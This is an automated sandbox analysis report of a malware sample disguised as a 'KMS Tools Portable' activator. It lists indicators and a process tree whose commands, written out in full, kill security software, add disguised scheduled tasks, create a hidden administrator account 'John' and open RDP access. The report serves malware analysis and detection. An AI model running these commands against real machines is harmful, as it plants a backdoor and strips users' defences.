description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWinst.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList GameGuard.exe -
AutoIT Executable 50 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral7/memory/2020-56-0x000000013F360000-0x00000001401DD000-memory.dmp autoit_exe behavioral7/memory/2020-57-0x000000013F360000-0x00000001401DD000-memory.dmp autoit_exe behavioral7/memory/2020-58-0x000000013F360000-0x00000001401DD000-memory.dmp autoit_exe behavioral7/memory/2020-59-0x000000013F360000-0x00000001401DD000-memory.dmp autoit_exe behavioral7/memory/2020-60-0x000000013F360000-0x00000001401DD000-memory.dmp autoit_exe behavioral7/memory/2020-61-0x000000013F360000-0x00000001401DD000-memory.dmp autoit_exe behavioral7/memory/2020-72-0x000000013F360000-0x00000001401DD000-memory.dmp autoit_exe behavioral7/memory/2020-75-0x000000013F360000-0x00000001401DD000-memory.dmp autoit_exe behavioral7/memory/2020-92-0x000000013F360000-0x00000001401DD000-memory.dmp autoit_exe behavioral7/memory/1472-101-0x000000013F9A0000-0x0000000140F29000-memory.dmp autoit_exe behavioral7/memory/1472-102-0x000000013F9A0000-0x0000000140F29000-memory.dmp autoit_exe behavioral7/memory/1472-103-0x000000013F9A0000-0x0000000140F29000-memory.dmp autoit_exe behavioral7/memory/1472-104-0x000000013F9A0000-0x0000000140F29000-memory.dmp autoit_exe behavioral7/memory/1472-105-0x000000013F9A0000-0x0000000140F29000-memory.dmp autoit_exe behavioral7/memory/1472-106-0x000000013F9A0000-0x0000000140F29000-memory.dmp autoit_exe behavioral7/memory/1472-109-0x000000013F9A0000-0x0000000140F29000-memory.dmp autoit_exe behavioral7/memory/1808-112-0x000000013FAE0000-0x0000000140AE0000-memory.dmp autoit_exe behavioral7/memory/1808-115-0x000000013FAE0000-0x0000000140AE0000-memory.dmp autoit_exe behavioral7/memory/1472-114-0x000000013F9A0000-0x0000000140F29000-memory.dmp autoit_exe behavioral7/memory/1808-116-0x000000013FAE0000-0x0000000140AE0000-memory.dmp autoit_exe behavioral7/memory/1808-118-0x000000013FAE0000-0x0000000140AE0000-memory.dmp autoit_exe behavioral7/memory/1808-119-0x000000013FAE0000-0x0000000140AE0000-memory.dmp autoit_exe behavioral7/memory/1472-122-0x000000013F9A0000-0x0000000140F29000-memory.dmp autoit_exe behavioral7/memory/1472-124-0x000000013F9A0000-0x0000000140F29000-memory.dmp autoit_exe behavioral7/memory/1808-125-0x000000013FAE0000-0x0000000140AE0000-memory.dmp autoit_exe behavioral7/memory/1472-139-0x000000013F9A0000-0x0000000140F29000-memory.dmp autoit_exe behavioral7/memory/1808-141-0x000000013FAE0000-0x0000000140AE0000-memory.dmp autoit_exe behavioral7/memory/1808-169-0x000000013FAE0000-0x0000000140AE0000-memory.dmp autoit_exe behavioral7/memory/2244-172-0x000000013F0E0000-0x0000000142463000-memory.dmp autoit_exe behavioral7/memory/2244-173-0x000000013F0E0000-0x0000000142463000-memory.dmp autoit_exe behavioral7/memory/2244-175-0x000000013F0E0000-0x0000000142463000-memory.dmp autoit_exe behavioral7/memory/2244-176-0x000000013F0E0000-0x0000000142463000-memory.dmp autoit_exe behavioral7/memory/2244-178-0x000000013F0E0000-0x0000000142463000-memory.dmp autoit_exe behavioral7/memory/2244-180-0x000000013F0E0000-0x0000000142463000-memory.dmp autoit_exe behavioral7/memory/2020-190-0x000000013F360000-0x00000001401DD000-memory.dmp autoit_exe behavioral7/memory/1808-194-0x000000013FAE0000-0x0000000140AE0000-memory.dmp autoit_exe behavioral7/memory/2244-196-0x000000013F0E0000-0x0000000142463000-memory.dmp autoit_exe behavioral7/memory/2020-200-0x000000013F360000-0x00000001401DD000-memory.dmp autoit_exe behavioral7/memory/2244-201-0x000000013F0E0000-0x0000000142463000-memory.dmp autoit_exe behavioral7/files/0x0006000000014b63-210.dat autoit_exe behavioral7/files/0x0006000000014b63-213.dat autoit_exe behavioral7/files/0x0006000000014b63-214.dat autoit_exe behavioral7/files/0x0006000000014b63-209.dat autoit_exe behavioral7/memory/2020-228-0x000000013F360000-0x00000001401DD000-memory.dmp autoit_exe behavioral7/memory/2244-233-0x000000013F0E0000-0x0000000142463000-memory.dmp autoit_exe behavioral7/memory/2020-238-0x000000013F360000-0x00000001401DD000-memory.dmp autoit_exe behavioral7/memory/2244-239-0x000000013F0E0000-0x0000000142463000-memory.dmp autoit_exe behavioral7/memory/2020-242-0x000000013F360000-0x00000001401DD000-memory.dmp autoit_exe behavioral7/memory/2020-247-0x000000013F360000-0x00000001401DD000-memory.dmp autoit_exe behavioral7/memory/1728-321-0x000000013F510000-0x00000001421CF000-memory.dmp autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
pid Process 2020 KMS Tools Unpack.exe 1472 GameGuard.exe 1808 update.exe 2216 net1.exe 2244 taskhostw.exe 2448 taskhost.exe 1728 taskhost.exe 1824 taskhostw.exe 3016 taskhostw.exe 2460 taskhostw.exe 1624 taskhostw.exe 2548 taskhostw.exe 976 taskhostw.exe 1400 taskhostw.exe 1440 taskhostw.exe 2448 taskhostw.exe 2560 taskhostw.exe 3004 taskhostw.exe 1752 taskhostw.exe 560 taskhostw.exe -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files\RDP Wrapper smss.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini smss.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWinst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWinst.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 904 sc.exe 844 sc.exe 2024 sc.exe 588 sc.exe 1984 sc.exe 1652 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString smss.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2724 schtasks.exe 1196 schtasks.exe 1496 schtasks.exe 1072 schtasks.exe 1604 schtasks.exe 2700 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1880 timeout.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\ProgramData\Setup\winmgmts:\ smss.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 37 IoCs
pid Process 1268 PING.EXE 2536 PING.EXE 2564 PING.EXE 1604 PING.EXE 2624 PING.EXE 2196 PING.EXE 1664 PING.EXE 2392 PING.EXE 2748 PING.EXE 2152 PING.EXE 2752 PING.EXE 2864 PING.EXE 2876 PING.EXE 1268 PING.EXE 940 PING.EXE 464 PING.EXE 1768 PING.EXE 2976 PING.EXE 2664 PING.EXE 3036 PING.EXE 2784 PING.EXE 844 PING.EXE 2840 PING.EXE 520 PING.EXE 552 PING.EXE 988 PING.EXE 2256 PING.EXE 2760 PING.EXE 1652 PING.EXE 1672 PING.EXE 1212 PING.EXE 2920 PING.EXE 2148 PING.EXE 2428 PING.EXE 2260 PING.EXE 912 PING.EXE 2404 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1472 GameGuard.exe 1472 GameGuard.exe 1472 GameGuard.exe 1472 GameGuard.exe 1472 GameGuard.exe 1808 update.exe 1808 update.exe 1808 update.exe 1808 update.exe 1472 GameGuard.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2020 KMS Tools Unpack.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2844 winserv.exe 2844 winserv.exe 2244 taskhostw.exe 2844 winserv.exe 2844 winserv.exe 2020 KMS Tools Unpack.exe 2844 winserv.exe 2244 taskhostw.exe 2244 taskhostw.exe 2952 winserv.exe 2952 winserv.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe 2244 taskhostw.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2244 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2844 winserv.exe Token: SeTakeOwnershipPrivilege 2952 winserv.exe Token: SeTcbPrivilege 2952 winserv.exe Token: SeTcbPrivilege 2952 winserv.exe Token: SeDebugPrivilege 2284 RDPWinst.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 2844 winserv.exe 2844 winserv.exe 2844 winserv.exe 2844 winserv.exe 2952 winserv.exe 2952 winserv.exe 2952 winserv.exe 2952 winserv.exe 2080 winserv.exe 2080 winserv.exe 2080 winserv.exe 2080 winserv.exe 2916 winserv.exe 2916 winserv.exe 2916 winserv.exe 2916 winserv.exe 2656 winserv.exe 2656 winserv.exe 2656 winserv.exe 2656 winserv.exe 2876 winserv.exe 2876 winserv.exe 2876 winserv.exe 2876 winserv.exe 2160 winserv.exe 2160 winserv.exe 2160 winserv.exe 2160 winserv.exe 520 winserv.exe 520 winserv.exe 520 winserv.exe 520 winserv.exe 696 winserv.exe 696 winserv.exe 696 winserv.exe 696 winserv.exe 1932 winserv.exe 1932 winserv.exe 1932 winserv.exe 1932 winserv.exe 1204 winserv.exe 1204 winserv.exe 1204 winserv.exe 1204 winserv.exe 1904 winserv.exe 1904 winserv.exe 1904 winserv.exe 1904 winserv.exe 608 winserv.exe 608 winserv.exe 608 winserv.exe 608 winserv.exe 2428 winserv.exe 2428 winserv.exe 2428 winserv.exe 2428 winserv.exe 320 winserv.exe 320 winserv.exe 320 winserv.exe 320 winserv.exe 2468 winserv.exe 2468 winserv.exe 2468 winserv.exe 2468 winserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2020 wrote to memory of 2032 2020 KMS Tools Unpack.exe 28 PID 2020 wrote to memory of 2032 2020 KMS Tools Unpack.exe 28 PID 2020 wrote to memory of 2032 2020 KMS Tools Unpack.exe 28 PID 2020 wrote to memory of 2032 2020 KMS Tools Unpack.exe 28 PID 2020 wrote to memory of 2032 2020 KMS Tools Unpack.exe 28 PID 2020 wrote to memory of 2032 2020 KMS Tools Unpack.exe 28 PID 2020 wrote to memory of 2032 2020 KMS Tools Unpack.exe 28 PID 2020 wrote to memory of 584 2020 KMS Tools Unpack.exe 29 PID 2020 wrote to memory of 584 2020 KMS Tools Unpack.exe 29 PID 2020 wrote to memory of 584 2020 KMS Tools Unpack.exe 29 PID 2020 wrote to memory of 584 2020 KMS Tools Unpack.exe 29 PID 584 wrote to memory of 1700 584 KMS.exe 30 PID 584 wrote to memory of 1700 584 KMS.exe 30 PID 584 wrote to memory of 1700 584 KMS.exe 30 PID 584 wrote to memory of 1700 584 KMS.exe 30 PID 1700 wrote to memory of 984 1700 cmd.exe 32 PID 1700 wrote to memory of 984 1700 cmd.exe 32 PID 1700 wrote to memory of 984 1700 cmd.exe 32 PID 1700 wrote to memory of 984 1700 cmd.exe 32 PID 1700 wrote to memory of 1268 1700 cmd.exe 33 PID 1700 wrote to memory of 1268 1700 cmd.exe 33 PID 1700 wrote to memory of 1268 1700 cmd.exe 33 PID 1700 wrote to memory of 1268 1700 cmd.exe 33 PID 2032 wrote to memory of 1472 2032 install.exe 34 PID 2032 wrote to memory of 1472 2032 install.exe 34 PID 2032 wrote to memory of 1472 2032 install.exe 34 PID 2032 wrote to memory of 1472 2032 install.exe 34 PID 1700 wrote to memory of 1664 1700 cmd.exe 128 PID 1700 wrote to memory of 1664 1700 cmd.exe 128 PID 1700 wrote to memory of 1664 1700 cmd.exe 128 PID 1700 wrote to memory of 1664 1700 cmd.exe 128 PID 2032 wrote to memory of 1808 2032 install.exe 35 PID 2032 wrote to memory of 1808 2032 install.exe 35 PID 2032 wrote to memory of 1808 2032 install.exe 35 PID 2032 wrote to memory of 1808 2032 install.exe 35 PID 1700 wrote to memory of 552 1700 cmd.exe 37 PID 1700 wrote to memory of 552 1700 cmd.exe 37 PID 1700 wrote to memory of 552 1700 cmd.exe 37 PID 1700 wrote to memory of 552 1700 cmd.exe 37 PID 1700 wrote to memory of 988 1700 cmd.exe 38 PID 1700 wrote to memory of 988 1700 cmd.exe 38 PID 1700 wrote to memory of 988 1700 cmd.exe 38 PID 1700 wrote to memory of 988 1700 cmd.exe 38 PID 1700 wrote to memory of 940 1700 cmd.exe 39 PID 1700 wrote to memory of 940 1700 cmd.exe 39 PID 1700 wrote to memory of 940 1700 cmd.exe 39 PID 1700 wrote to memory of 940 1700 cmd.exe 39 PID 1472 wrote to memory of 1292 1472 GameGuard.exe 40 PID 1472 wrote to memory of 1292 1472 GameGuard.exe 40 PID 1472 wrote to memory of 1292 1472 GameGuard.exe 40 PID 1472 wrote to memory of 916 1472 GameGuard.exe 124 PID 1472 wrote to memory of 916 1472 GameGuard.exe 124 PID 1472 wrote to memory of 916 1472 GameGuard.exe 124 PID 1472 wrote to memory of 1732 1472 GameGuard.exe 44 PID 1472 wrote to memory of 1732 1472 GameGuard.exe 44 PID 1472 wrote to memory of 1732 1472 GameGuard.exe 44 PID 1472 wrote to memory of 1964 1472 GameGuard.exe 46 PID 1472 wrote to memory of 1964 1472 GameGuard.exe 46 PID 1472 wrote to memory of 1964 1472 GameGuard.exe 46 PID 1472 wrote to memory of 1600 1472 GameGuard.exe 49 PID 1472 wrote to memory of 1600 1472 GameGuard.exe 49 PID 1472 wrote to memory of 1600 1472 GameGuard.exe 49 PID 1472 wrote to memory of 1724 1472 GameGuard.exe 52 PID 1472 wrote to memory of 1724 1472 GameGuard.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\KMS Tools Portable\KMS Tools Unpack.exe"C:\Users\Admin\AppData\Local\Temp\KMS Tools Portable\KMS Tools Unpack.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\ProgramData\Setup\install.exeC:\ProgramData\Setup\install.exe -palexpassword2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\ProgramData\Setup\GameGuard.exe"C:\ProgramData\Setup\GameGuard.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Blocks application from running via registry modification
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv4⤵PID:1292
-
C:\Windows\system32\sc.exesc delete swprv5⤵
- Launches sc.exe
PID:588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice4⤵PID:916
-
C:\Windows\system32\sc.exesc stop mbamservice5⤵
- Launches sc.exe
PID:1652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice4⤵PID:1732
-
C:\Windows\system32\sc.exesc stop bytefenceservice5⤵
- Launches sc.exe
PID:844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice4⤵PID:1964
-
C:\Windows\system32\sc.exesc delete bytefenceservice5⤵
- Launches sc.exe
PID:2024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice4⤵PID:1600
-
C:\Windows\system32\sc.exesc delete mbamservice5⤵
- Launches sc.exe
PID:1984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on4⤵PID:1228
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state on5⤵
- Modifies Windows Firewall
PID:624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc4⤵PID:1724
-
C:\Windows\system32\sc.exesc delete crmsvc5⤵
- Launches sc.exe
PID:904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AppModule" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵PID:1328
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="AppModule" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:1740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AMD" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵PID:1264
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="AMD" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:1664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵PID:776
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN5⤵
- Modifies Windows Firewall
PID:1612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵PID:268
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN5⤵
- Modifies Windows Firewall
PID:1616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵PID:668
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN5⤵
- Modifies Windows Firewall
PID:1764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵PID:1916
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN5⤵
- Modifies Windows Firewall
PID:1088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force4⤵PID:1736
-
C:\Windows\system32\gpupdate.exegpupdate /force5⤵PID:772
-
-
-
C:\Windows\system32\cmd.execmd /c C:\Programdata\Install\Delete.bat4⤵PID:1812
-
C:\Windows\system32\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
PID:1880
-
-
-
-
C:\ProgramData\Setup\update.exe"C:\ProgramData\Setup\update.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1808 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\RealtekCheck" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:1196
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:1496
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:1072
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\TaskCheck" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:1604
-
-
C:\ProgramData\Setup\Game.exeC:\ProgramData\Setup\Game.exe -ppidar4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2120 -
C:\ProgramData\RealtekHD\taskhost.exe"C:\ProgramData\RealtekHD\taskhost.exe"5⤵PID:2216
-
-
C:\ProgramData\RealtekHD\taskhostw.exe"C:\ProgramData\RealtekHD\taskhostw.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:2244
-
-
-
C:\ProgramData\Setup\svchost.exeC:\ProgramData\Setup\svchost.exe -ppidar4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2464 -
C:\ProgramData\Setup\IP.exe"C:\ProgramData\Setup\IP.exe"5⤵
- Executes dropped EXE
PID:2620
-
-
C:\ProgramData\Setup\smss.exe"C:\ProgramData\Setup\smss.exe"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Checks processor information in registry
- NTFS ADS
PID:2648 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST6⤵
- Creates scheduled task(s)
PID:2700
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST6⤵
- Creates scheduled task(s)
PID:2724
-
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2844 -
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" -second7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user John 12345 /add6⤵PID:1912
-
C:\Windows\system32\net.exenet user John 12345 /add7⤵PID:1704
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user John 12345 /add8⤵PID:1304
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add6⤵PID:1456
-
C:\Windows\system32\net.exenet localgroup "Администраторы" John /add7⤵PID:568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" John /add8⤵PID:2124
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add6⤵PID:2096
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add7⤵PID:1664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add8⤵PID:1768
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add6⤵PID:1080
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного управления" john /add" John /add7⤵PID:1916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add8⤵PID:2312
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add6⤵PID:944
-
C:\Windows\system32\net.exenet localgroup "Administrators" John /add7⤵PID:1740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add8⤵PID:1524
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add6⤵PID:2040
-
C:\Windows\system32\net.exenet localgroup "Administradores" John /add7⤵PID:2176
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add8⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2216
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add6⤵PID:1576
-
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" john /add7⤵PID:2184
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add8⤵PID:2400
-
-
-
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -i6⤵
- Sets DLL path for service in the registry
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:2284 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow7⤵
- Modifies Windows Firewall
PID:2180
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\KMS Tools Portable\KMS.exe"C:\Users\Admin\AppData\Local\Temp\KMS Tools Portable\KMS.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\SelfDelete.bat3⤵
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵PID:984
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:1268
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:1664
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:552
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:988
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:940
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:2152
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:2256
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:2392
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:2536
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:2752
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:2976
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:1212
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:464
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:2260
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:912
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:2564
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:1604
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:2664
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:2748
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:2760
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost4⤵
- Runs ping.exe
PID:2624
